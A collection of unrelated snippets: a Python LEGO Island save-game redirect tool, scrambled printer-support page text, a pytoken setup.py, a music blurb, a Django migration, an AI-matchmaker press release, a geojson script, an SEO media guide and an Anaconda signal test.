logging.info("User is running 32-bit (x86) Windows, use x86 Registry Strings")
eightsixReDirect()
# Switch to 64-bit registry string code
elif osbit == 'x64':
logging.info("User is running 64-bit (x64) Windows, use x64 Registry Strings")
sixfourReDirect()
# ------------ End Save Game ReDirect Intro ------------ #
# ------------ Begin Save Game ReDirect code for Windows x86 ------------ #
def eightsixReDirect():
'''Redirects LEGO Island Save Games on Windows x86'''
logging.info("'Open HKEY_LOCAL_MACHINE\SOFTWARE\Mindscape\LEGO Island\savepath' for reading")
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SOFTWARE\Mindscape\LEGO Island', 0, winreg.KEY_READ) as oldx86save:
oldx86path = winreg.QueryValueEx(oldx86save, 'savepath')
# Convert tuple to str(ing)
logging.info("Convert tuple returned by registry string to a string")
oldx86path = "".join(str(oldx86path))
# Clean up string to get a clean folder path
logging.info("Cleaning up folder path...")
oldx86path = oldx86path.strip("(''), 1")
# Tell where current save games are located
logging.info("Your {0} Save Games are currently located at {1}".format(game,
oldx86path))
print('\nYour {0} Save Games are currently located at\n"{1}"'.format(game,
oldx86path))
time.sleep(2)
# Draw (then withdraw) the root Tk window
logging.info("Drawing root Tk window")
root = tkinter.Tk()
logging.info("Withdrawing root Tk window")
root.withdraw()
# Select where you want your Save Games to be moved to
# TODO: Make dialog active window automatically and
# do the same to main window when closed.
logging.info("Display folder selection dialog for new Save Game Location.")
newsavepath = filedialog.askdirectory(
title="Please select the new location for your {0} Save Games:".format(
game))
# The user clicked cancel
if len(newsavepath) == 0:
logging.warning("User canceled the Save Game redirection!")
print("\nCanceling Save Game ReDirection...\n")
time.sleep(1)
main()
# The user selected a folder
else:
logging.info("User selected a new Save Game location at {0}".format(
newsavepath))
try:
# This checks for any *.GS files in savepath, and deletes them
# This has to be done because Windows does not allow
# a file to be overwritten. :|
for root, dir, files in os.walk(newsavepath):
for gsfile in files:
if gsfile.upper().endswith(".GS"):
os.unlink(os.path.join(newsavepath, gsfile))
# This checks for any *.gsi files in savepath, and deletes them
# This has to be done because Windows does not allow
# a file to be overwritten. :|
for root, dir, files in os.walk(newsavepath):
for gsifile in files:
if gsifile.lower().endswith(".gsi"):
os.unlink(os.path.join(newsavepath, gsifile))
# Move all *.GS files to the new path
for gsfile in glob.glob("{0}/*.GS".format(oldx86path)):
shutil.move(gsfile, newsavepath)
# Move all *.gsi files to the new path
for gsifile in glob.glob("{0}/*.gsi".format(oldx86path)):
shutil.move(gsifile, newsavepath)
'''So the final workflow is: if file exists: delete, then move.
if not exists: move'''
# Write Registry String with new path
logging.info("'Write HKEY_LOCAL_MACHINE\SOFTWARE\Mindscape\LEGO Island\savepath' with new save path")
with winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE,
'SOFTWARE\Mindscape\LEGO Island') as newx86savekey:
winreg.SetValueEx(newx86savekey, "savepath",
0, winreg.REG_SZ, newsavepath)
# Save games sucessfully redirected! :D
print('\n{0} save games sucessfully redirected to "{1}".'.format(game,
newsavepath))
# The User does not have the rights to redirect the save games! D:
except PermissionError:
logging.warning('''{0} does not have the user rights to operate!
Please relaunch {0} as an Administrator.'''.format(app))
print('''\n{0} does not have the user rights to operate!
Please relaunch {0} as an Administrator.'''.format(app))
# Go back to main menu no matter the outcome
finally:
time.sleep(3)
main()
# ------------ End Save Game ReDirect code for Windows x86 ------------ #
# ------------ Begin Save Game ReDirect code for Windows x64 ------------ #
def sixfourReDirect():
'''Redirects LEGO Island Save Games on Windows x64'''
logging.info("'Open HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mindscape\LEGO Island\savepath' for reading")
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SOFTWARE\Wow6432Node\Mindscape\LEGO Island', 0,
winreg.KEY_READ) as oldx64save:
oldx64path = winreg.QueryValueEx(oldx64save, 'savepath')
# Convert tuple to str(ing)
logging.info("Convert tuple returned by registry string to a string")
oldx64path = "".join(str(oldx64path))
# Clean up string to get a clean folder path
logging.info("Cleaning up folder path...")
oldx64path = oldx64path.strip("(''), 1")
# Tell where current save games are located
logging.info("Your {0} Save Games are currently located at {1}".format(game,
oldx64path))
print('\nYour {0} Save Games are currently located at\n"{1}"'.format(game,
oldx64path))
time.sleep(2)
# Draw (then withdraw) the root Tk window
logging.info("Drawing root Tk window")
root = tkinter.Tk()
logging.info("Withdrawing root Tk window")
root.withdraw()
# Select where you want your Save Games to be moved to
# TODO: Make dialog active window automatically
# and do the same to main window when closed.
logging.info("Display folder selection dialog for new Save Game Location.")
newsavepath = filedialog.askdirectory(
title="Please select the new location for your {0} Save Games:".format(
game))
# The user clicked cancel
if len(newsavepath) == 0:
logging.warning("User canceled the Save Game redirection!")
print("\nCanceling Save Game ReDirection...\n")
time.sleep(1)
main()
# The user selected a folder
else:
logging.info("User selected a new Save Game location at {0}".format(
newsavepath))
try:
# This checks for any *.GS files in savepath, and deletes them
# This has to be done because Windows does not allow
# a file to be overwritten. :|
for root, dir, files in os.walk(newsavepath):
for gsfile in files:
if gsfile.upper().endswith(".GS"):
os.unlink(os.path.join(newsavepath, gsfile))
# This checks for any *.gsi files in savepath, and deletes them
# This has to be done because Windows does not allow
# a file to be overwritten. :|
for root, dir, files in os.walk(newsavepath):
for gsifile in files:
if gsifile.lower().endswith(".gsi"):
os.unlink(os.path.join(newsavepath, gsifile))
# Move all *.GS files to the new path
for gsfile in glob.glob("{0}/*.GS".format(oldx64path)):
shutil.move(gsfile, newsavepath)
# Move all *.gsi files to the new path
for gsifile in glob.glob("{0}/*.gsi".format(oldx64path)):
shutil.move(gsifile, newsavepath)
'''So the final workflow is: if file exists: delete, then move.
if not exists: move'''
# Write Registry String with new path
logging.info("'Write HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mindscape\LEGO Island\savepath' with new save path")
with winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE,
'SOFTWARE\Wow6432Node\Mindscape\LEGO Island') as newx64savekey:
winreg.SetValueEx(newx64savekey, "savepath",
0, winreg.REG_SZ, newsavepath)
# Save games sucessfully redirected! :D
print('\n{0} save games sucessfully redirected to "{1}".'.format(game,
newsavepath))
# The User does not have the rights to redirect the save games! D:
except PermissionError:
logging.warning('''{0} does not have the user rights to operate!
Please relaunch {0} as an Administrator.'''.format(app))
print('''\n{0} does not have the user rights to operate!
Please relaunch {0} as an Administrator.'''.format(app))
# Go back to main menu no matter the outcome
finally:
time.sleep(3)
main()
# ------------ End Save Game ReDirect code for Windows x64 ------------ #
if __name__ == "__main__":
# Write window title (since there is no GUI)
os.system("title {0} {1} {2}".format(app, majver, minver))
# Run preload() to begin ICU ReDirect Initialization
preload() |
Tablets by David Carnoy 7 days ago. Bose, Sony, Sennheiser and Jaybird Here’s a selection of the best headphone shopping values this holiday season. Software Operating System Support. Promote cracked software, or other illegal content. Laptops by Dan Ackerman Nov 26, The email address entered is already associated to an account.
Lift up the scanner. Add Your Answer Tips for a great answer: Printers by Rick Broida Oct 16, Tell us some more!
Best Cyber Monday deals at Staples: Lift up the scanner to access the printer area. You are logged in as. Turn off the Stylus CX. It’s worth a thousand words.
Epson Stylus Office Equipment Login to post Please use English characters only. If the ink cartridge cover is not completely closed, the print head may have trouble moving back and forth. I have freestanding Series 8 dishwasher. Tablets by David Carnoy Dec 13, PC Connectivity Connection Availability. Printing Max Printing Resolution.
Sexually explicit or offensive language. Follow these steps to remove the packing materials: Laptops by Dan Ackerman Sep 25, The email address entered is already associated to an account. Also If the packing materials are not removed, the print head will be unable to move and the error code E may appear on the control panel display. Press down on the ink cartridge cover to make sure it is completely closed.
Power Power Consumption Operational. Remove the Scanndr from the Printer!!!!! Thank You for Submitting Your Review,! Tablets by David Carnoy 7 days ago.
Max Copying Speed Color. Login or create an account to post a review.
Turn the Stylus CX back on. The max point reward for answering a question is I already changed the USB port and in everyone the result is the same. |
import sys
import os
import pdb
import shutil
import os.path
from distutils.command.clean import clean as _clean
from distutils.core import setup, Extension
from distutils import sysconfig
##################################################################
def customize_compiler2(compiler):
(cc, cxx, opt, cflags, ccshared, ldshared, so_ext) = \
sysconfig.get_config_vars('CC', 'CXX', 'OPT', 'CFLAGS',
'CCSHARED', 'LDSHARED', 'SO')
if 0:
print "cc=", cc
print "cxx=", cxx
print "opt=", opt
print "cflags=", cflags
print "ccshared=", ccshared
cflags = cflags.replace("-DNDEBUG", "")
cflags = cflags.replace("-O2", "")
cpp = cc + " -E"
cc_cmd = cc + ' ' + cflags
compiler.set_executables(
preprocessor=cpp,
compiler=cc_cmd,
compiler_so=cc_cmd + ' ' + ccshared,
compiler_cxx=cxx,
linker_so=ldshared,
linker_exe=cc)
compiler.shared_lib_extension = so_ext
return
idx = None
for i, arg in enumerate(sys.argv):
if arg == "-debug":
idx = i
if idx:
sys.argv.pop(idx)
d = sysconfig.__dict__
d['customize_compiler'] = customize_compiler2
##################################################################
##
## the main module - escape
##
##################################################################
escape_module = Extension('escape',
sources = ['escapemodule.c'])
mlist = [escape_module]
##################################################################
##
## benchark support - most folks won't need this
##
##################################################################
idx = None
for i, arg in enumerate(sys.argv):
if arg == "-bmark":
idx = i
if idx:
sys.argv.pop(idx)
slist = ["bmarkmodule.c", "bmark_scan.c"]
obj = Extension("bmark", sources=slist)
mlist.append(obj)
# does distutils have a way to run flex?
cmd = "flex -f -s -B -L -obmark_scan.c -Pbmark bmark_scan.lex"
print "Running flex command"
print cmd
c = os.system(cmd)
if c != 0:
print "Flex return non-zero status. Stopping."
sys.exit(-1)
##################################################################
##
## custom clean func
##
##################################################################
class clean(_clean):
"""Custom clean routine to clean pyc files"""
def run(self):
_clean.run(self)
if os.path.exists("build"):
print "Removing build dir"
shutil.rmtree("build")
for f in os.listdir("."):
if f.endswith(".pyc") \
or f.endswith("~") \
or f.endswith(".s") \
or f.endswith(".o") \
or f in ("a.out", "pytoken.tar.gz"):
os.unlink(f)
for f in ["parser.out", "parsetab.py"]:
try:
os.unlink(f)
except OSError:
pass
return
pass
##################################################################
##
## toplevel
##
##################################################################
## how can I force setup to turn off -O ??
##
setup(name = 'pytoken',
version = '1.01',
description = 'Generates scanners for python.',
author = 'Ram Bhamidipaty',
author_email = 'rambham@gmail.com',
url = 'http://code.google.com/p/pytoken/',
ext_modules = mlist,
py_modules = ['pytoken', 'pytoken_ply_lex'],
cmdclass = {"clean" : clean} )
|
Not surprisingly, we are big fans of the music of Liz Harris. Mirroring, who released an album earlier this year, paired Harris with Tiny Vipers’ Jesy Fortino. Her work as Grouper has ranged from the ethereal to the jarringly surreal; 2011’s A I A (released on CD by Kranky this year) is probably the best overview of her work as a whole.
Kranky will be releasing the next Grouper album in February. It’s called The Man Who Died In His Boat, and — if the song “Vital” is any indication — will likely fall somewhat on the “accessible” side of Harris’s discography. Alternately: it’s haunting but not terrifying. |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
"Write your forwards methods here."
# Note: Don't use "from appname.models import ModelName".
# Use orm.ModelName to refer to models in this application,
# and orm['appname.ModelName'] for models in other applications.
Site = orm['sites.Site']
all_sites = Site.objects.all()
for ad in orm.AdBase.objects.all():
ad.sites = all_sites
def backwards(self, orm):
"Write your backwards methods here."
models = {
'adzone.adbase': {
'Meta': {'object_name': 'AdBase'},
'advertiser': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['adzone.Advertiser']"}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['adzone.AdCategory']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'since': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sites.Site']", 'symmetrical': 'False'}),
'start_showing': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'stop_showing': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(9999, 12, 29, 0, 0)'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'zone': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['adzone.AdZone']"})
},
'adzone.adcategory': {
'Meta': {'ordering': "('title',)", 'object_name': 'AdCategory'},
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'adzone.adclick': {
'Meta': {'object_name': 'AdClick'},
'ad': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['adzone.AdBase']"}),
'click_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'source_ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'})
},
'adzone.adimpression': {
'Meta': {'object_name': 'AdImpression'},
'ad': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['adzone.AdBase']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'impression_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'source_ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'})
},
'adzone.advertiser': {
'Meta': {'ordering': "('company_name',)", 'object_name': 'Advertiser'},
'company_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'adzone.adzone': {
'Meta': {'ordering': "('title',)", 'object_name': 'AdZone'},
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'adzone.bannerad': {
'Meta': {'object_name': 'BannerAd', '_ormbases': ['adzone.AdBase']},
'adbase_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['adzone.AdBase']", 'unique': 'True', 'primary_key': 'True'}),
'content': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'})
},
'adzone.textad': {
'Meta': {'object_name': 'TextAd', '_ormbases': ['adzone.AdBase']},
'adbase_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['adzone.AdBase']", 'unique': 'True', 'primary_key': 'True'}),
'content': ('django.db.models.fields.TextField', [], {})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['adzone']
symmetrical = True
|
DENVER, CO – 12-20-2018 (PRDistribution.com) — Kevin Teman, through his own personal struggles with finding a partner created the world’s first talking artificially intelligent matchmaker, which operates entirely by speaking with you (through an AI voice).
Paired with its recent world news break (AFP), AIMM announces its national expansion, starting in California. Kevin Teman’s approach at combining human matchmaking techniques with talking artificial intelligence has already begun changing the dating world and was hand picked by Robert Downey Jr’s team and featured in Robert’s new docu- series airing on YouTube Red in Summer 2019 (Age of AI).The series, considered to be YouTube Red’s flagship product, calls Kevin “a leader in AI”.“Most of us have suffered through dating apps and sites for many years Kevin Teman says, “maybe our entire single lives. Although many of us, if we’re smart, have withdrawn from dating apps entirely.”Teman says even the best dating apps have become disrespectful, ineffective and childish. “Wading through fake profiles, dealing with less-than-stellar company morals, profit schemes, using apps that feel like they were made for kids,” Teman says, “one is left feeling utterly disrespected by the process and the companies themselves”.“I have a strong dislike for the dating industry,” Kevin says, “Its standards are incredibly low, very little has been done to help the problems. Mostly each new app chimes in for another piece of your money. It absolutely needs to change.”“Self-respecting adults,” Kevin says, “long for solutions that are effective and feel grown up, straight-forward. Flirts, winks, roses and virtual gifts and other junk” Teman says “detract from real human connections and push us into a fake online world. This is not how online dating should have ever been.”In Kevin’s life struggle through dating apps and other services to meet his own life partner he eventually turned to a human matchmaking — that’s right, a real human person. Having learned of matchmaking through discussions with friends in dating companies, Kevin’s engagement in human matchmaking opened his eyes to a new world. “This world of effective matchmaking techniques, hand-holding, building people up to each other, getting them excited about each other,” Kevin said, “felt day-and- night compared to dating apps. How could two industries have such drastically different approaches to the same goal?” Something felt awry. Matchmaking services give these deep, wonderful introductions, facilitated the start of your relationship, held your hand, and were respectful, while dating apps seem to drop you in a complicated situation and leave you to your own devices.But matchmaking services cost enormous amounts of money in the 10s of thousands to experience yourself. This is where AIMM comes in, AIMM facilitates the start of a relationship for you using the same effective matchmaking techniques for very low cost – essentially the distributed cost of maintaining the AI.AIMM has amassed 1,000 users in Denver, Colorado through its grass-roots advertising primarily through radio and local events in Denver. But that hasn’t stopped national press from recognizing AIMM. With its recent world-news break through Associated France Press, L’ Express and endorsements from Robert’s documentary, AIMM is announcing its national expansion, starting in California.“AIMM started as a ‘grass-roots’ effort primarily headed by myself,” says Kevin, “and largely so that I could find someone for myself.” With some big names recently providing their support, AIMM’s team is expanding, AIMM foresees a speeding up of growth over the next year as it expands first to California and other states.“Human matchmaking opened the door to a new world for me. I want to give that back to everyone through AIMM so they can experience the same effective techniques I did,” says Teman.
For the original news story, please visit https://prdistribution.com/news/aimm-worlds-first-talking-ai-matchmaker-featured-in-robert-downey-jrs-upcoming-docu-series-on-artificial-intelligence.html. |
import geojson
import json
import os
from geojson import Feature, FeatureCollection
from .config import json_dir, geojson_dir
from .utils import read_json, write_file_contents
from .geom import sort_geojson
def make_features(border, process_raw_geometry):
print '---\nMaking features'
features = list()
for filename in os.listdir(json_dir):
json_file = os.path.join(json_dir, filename)
data = read_json(json_file)
for d in data:
if d['geom_raw'] == 'Lateral limits as for Budapest FIR': # TODO
continue
if d['geom_raw'] == 'along border AUSTRIA_HUNGARY then a clokwise arc radius centered on 7.6 KM 474052N 0164600E': # TODO
continue
geom = process_raw_geometry(d['geom_raw'], border)
# making union when geom_raw_union is present
if 'geom_raw_union' in d:
geom_and = process_raw_geometry(d['geom_raw_union'], border)
geom = geom.union(geom_and)
properties = {k: v for k, v in d.iteritems() if not k.startswith('geom')}
feature = Feature(geometry=geom, id=1, properties=properties)
features.append(feature)
return features
def write_geojsons(features):
classes = {f['properties']['class'] for f in features}
for cl in classes:
fc = FeatureCollection([f for f in features if f['properties']['class'] == cl])
geojson_data = sort_geojson(json.loads(geojson.dumps(fc)))
body = json.dumps(geojson_data, ensure_ascii=False, indent=2, sort_keys=True)
write_file_contents(os.path.join(geojson_dir, '{}.geojson'.format(cl)), body)
|
Your text is not the only front-end content in your website that can contribute to the SEO of your site. There are also images and videos that help you gain rank, establish relevance or access rank positions quickly.
This step will discuss several different ways that media can either help or hinder your ranking in search engines and how to leverage that as much as you can. It will differ quite a bit from one genre to the next, so just take these tips as generalities around Search Engine Optimising media in the ‘ideal world’.
You’ve probably noticed in Google search that you can filter for images and videos, well, that’s reflected in Google Search Console as separate search data.
Websites in some genres can gain significant volumes of traffic from those sources.
For every image you plan to upload and use in your website, name them with human-readable text names like ‘green t-shirt with Nike logo’ for example, or maybe: ‘man holding custom safety sign’.
Whatever description is most appropriate for your product, label it with just enough words to make it clear what the image is about. Imagine it like this: if you had to describe the content of an image as quickly as possible to a blind person, the description you’d come up with would probably be suitable as the image name.
For those of you who love to keep your images in some kind of naming order, you’ll probably hate this concept, but this is a best practice for SEO, especially if you have to deal with a lot of images, like in an eCommerce store.
Most digital images come out of the camera with some kind of ordered label, probably something like DSC0001 and have progressively higher numbers, like DSC0002, DSC0003 etc. Unfortunately, these are meaningless for SEO and this is partly why naming the file appropriately is necessary.
Think about where you plan to use the images before you upload.
If they only have to be small and cover less than ½ the width of a typical website, then it’s unlikely they need to have dimensions larger than 600px by 600px. The typical modern website has a width of about 1000px to 1400px, unless set to full screen.
The display size, and especially the capability to display for variable screen sizes from small to very large, is a factor for Google ranking. Screens and resolutions have gotten larger, so website have too.
Pre-size your images according to the maximum size you need to display them at. Not doing so might mean storing many megabytes (or even gigabytes) more of data in your site, and also making your images load very slowly when displaying on your site.
The latter may affect your SEO because it means Google will also have to wait to download what your page looks like. This may count against you when assessing ranking for your site.
Google monitors download speeds of websites and also check image size and bandwidth use, which you can get a report on using the Google PageSpeed Insights tool.
Aside from sizing, also consider aspect ratio. Images that have content that looks best in landscape format will not look good at all if you want to place them in a portrait sized space in your website. Check that the shape of your image matches the shape of the space you need to fit it into.
There are two main ways you can upload images into your website.
The first and probably least technically challenging way is to use the CMS (if your website has one) to upload images into a media folder of some sort. For WordPress websites, like this one, you can choose to upload images into a dated folder, or add them into a single generic folder.
Dated folders are usually divided by year, then month, for example 2015/1/ and then 2015/2/ etc., based on the month in which you uploaded it.
Generic folders might be called ‘media’ or ‘images’ and all your images and or media might upload to there.
For the latter, you can’t have two images or any other file of the same name in the same folder, which means every size images might have to have a size code appended to the image name, like ‘green-t-shirt-200×300.jpg’. This images would measure 200px by 300px. The size code may reduce a little of the SEO strength of a well-named image, but shouldn’t be too much of an issue, so don’t worry about it.
If you’ve used your CMS to upload images, something you should be aware of: The WordPress CMS (and this may be true for many different CMS types) might modify the name of your file. Especially if your file name contains characters that are not permitted by HTML conventions.
For example, the character ‘&’ is usually removed and replaced by ‘-‘. So are spaces. But only one dash is allowed at a time. So a file called ‘Green & Red T-shirt.jpg’ will become ‘green-red-t-shirt.jpg’.
The WordPress CMS will also re-sample your images and create new copies of each image at 2 or 3 different sizes, including the original size. The exact sizes depend on your CMS settings.
2. An FTP software on your computer.
Using FTP will allow you to upload images and videos that bypass the HTML naming convention changes noted above. It also allows you to create any new folders in your website to store your images just about anywhere.
Once you’ve named your images, you can add title and ALT tags, but these are often easier to add once you’ve imported or uploaded the images into your website. This is where SEO comes into play.
If you named your images as suggested above, then tagging them with ALT and Title tags will be a lot simpler, because all you need to do is copy the name of the file. If you don’t have time to tag all of your images, you at least have the file names optimised.
This is why naming files with their content is important, because in doing so, you usually use keywords that are relevant to your site. If not, then you should take the time to tag the images – you should do this anyway – but you can ‘get away’ with not doing it if you have hundreds of images and they are well named.
The ALT tag and Title tag can be different, and they are used for different purposes in the browser.
The Title tag is the tag that provides additional information to the content of the image when displayed in the browser. It may appear when the user hovers their mouse over the image.
The ALT tag is the information that appears in the browser in the place of the image when the image has not been loaded for some reason. There are many reasons why an image does not load, but the point here is that by setting an ALT you can still provide meaningful content to the user in its place.
Both the ALT tag and Title tags should contain a keyword relevant to the page in which they appear. If you need to use the same image elsewhere on a page with different keyword focus, then upload the image again so you can set a second ALT and Title for the new image placement.
Avoid overcrowding any tags with multiple keywords for the same reason that stuffing a page full of various keywords is not a good plan for SEO.
Browsers like Explorer, Firefox, Chrome, Safari etc all support the same image types served across the internet.
This selection should be made before uploading your images to the website as most CMSs are unable to change an image type from one to another.
JPG images are best when you need to display photos. Especially when the photo has shading, lots of colour, lots of texture etc. JPG also supports variable compression – see below.
GIF images are best when your image has limited colours, like in logos. Often a logo will have just two or three colours. My logo for this site has just one colour. These image types only support limited colour variance, so check that your colour selections are appropriate before choosing to use GIF. This format can also support transparent pixels (transparent parts of the image where no colour is needed or where the background is supposed to show through – common for logos).
PNG images support a full colour range and also transparency. They offer some compression capability, but generally result in the largest files of the three possible formats. If no transparency is required, then JPG is the better choice.
Whenever possible, aim to use the image type and compression setting that allows you to display your images well but only just within the point where compression starts to make them lose quality. This is called ‘visual optimisation’. This is also the point where your image file will be the smallest possible without affecting your UX. Every image should be visually optimised.
This is also the point where your images will load into the user’s browser as quickly as possible without the compromise on quality. If you’re not sure if your images are optimised for best load speed, try the Page Speed Insights test provided by Google.
You will also see a site-wide effect in Google Search Console on page-load speeds (in the section about Crawl) if you have un-optimised images. Your site’s average download time in GSC should be around 2000ms or less.
The Page Speed Insights test will show you if your images need optimising. It’s probable that the data from GSC on Crawl download speeds will affect the SEO of your website, because the preference for Google is to provide their users with links to sites that have the best UX.
As with images, the shape and size of video should be limited to the shape and size it will display in your site.
If you plan to use YouTube or Vimeo to host your videos, you don’t have quite the same constraints as with images, but you should still consider how much data you really need to provide. If the video resolution is too high, then the user’s browser buffer may cause videos to ‘jitter’ as they play.
Videos are also tagged in the same manner as images although the terminology and parameters are a little different. Videos will allow the use of a title element – which is the title of the video.
If using YouTube, you have a 100 character limit and should write the title to include the main keywords relevant to both the video and the location in which you are going to place it (if adding it into a website).
Video descriptions are quite expansive and allow up to 5000 characters. This should contain a full description of the content of your video and should use keywords. They’re a top spot for adding SEO value into your video.
Tags can also be used and are essentially a range of keywords for which your video might be an appropriate piece of content should someone search for any keyword from the list.
Videos via YouTube also support the addition of transcripts, annotations and captions, each of which add to SEO value.
There is some tendency for Google to ‘prefer’ short videos of under 1min. Your goal might be to produce a video in the 30-90 seconds length range for best SEO, however the length is only one factor in addition to those noted above which me be offset by other well optimised features should your video be longer than a couple of minutes.
If you plan to host your own videos, ensure you are able to show whichever format is required by the browser. Not all operating systems and browsers universally support a single format. You will need to prepare your video in 3 commonly used formats and have them sampled appropriately for fastest streaming. |
#
# Martin Kolman <mkolman@redhat.com>
#
# Copyright 2016 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use, modify,
# copy, or redistribute it subject to the terms and conditions of the GNU
# General Public License v.2. This program is distributed in the hope that it
# will be useful, but WITHOUT ANY WARRANTY expressed or implied, including the
# implied warranties of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Any Red Hat
# trademarks that are incorporated in the source code or documentation are not
# subject to the GNU General Public License and may only be used or replicated
# with the express permission of Red Hat, Inc.
#
# Test the Python-based signal and slot implementation.
#
import unittest
from pyanaconda.core.signal import Signal
class FooClass(object):
def __init__(self):
self._var = None
@property
def var(self):
return self._var
def set_var(self, value):
self._var = value
class SignalTestCase(unittest.TestCase):
def setUp(self):
self.var = None
def method_test(self):
"""Test if a method can be correctly connected to a signal."""
signal = Signal()
foo = FooClass()
self.assertIsNone(foo.var)
# connect the signal
signal.connect(foo.set_var)
# trigger the signal
signal.emit("bar")
# check if the callback triggered correctly
self.assertEqual(foo.var, "bar")
# try to trigger the signal again
signal.emit("baz")
self.assertEqual(foo.var, "baz")
# now try to disconnect the signal
signal.disconnect(foo.set_var)
# check that calling the signal again
# no longer triggers the callback
signal.emit("anaconda")
self.assertEqual(foo.var, "baz")
def function_test(self):
"""Test if a local function can be correctly connected to a signal."""
# create a local function
def set_var(value):
self.var = value
signal = Signal()
self.assertIsNone(self.var)
# connect the signal
signal.connect(set_var)
# trigger the signal
signal.emit("bar")
# check if the callback triggered correctly
self.assertEqual(self.var, "bar")
# try to trigger the signal again
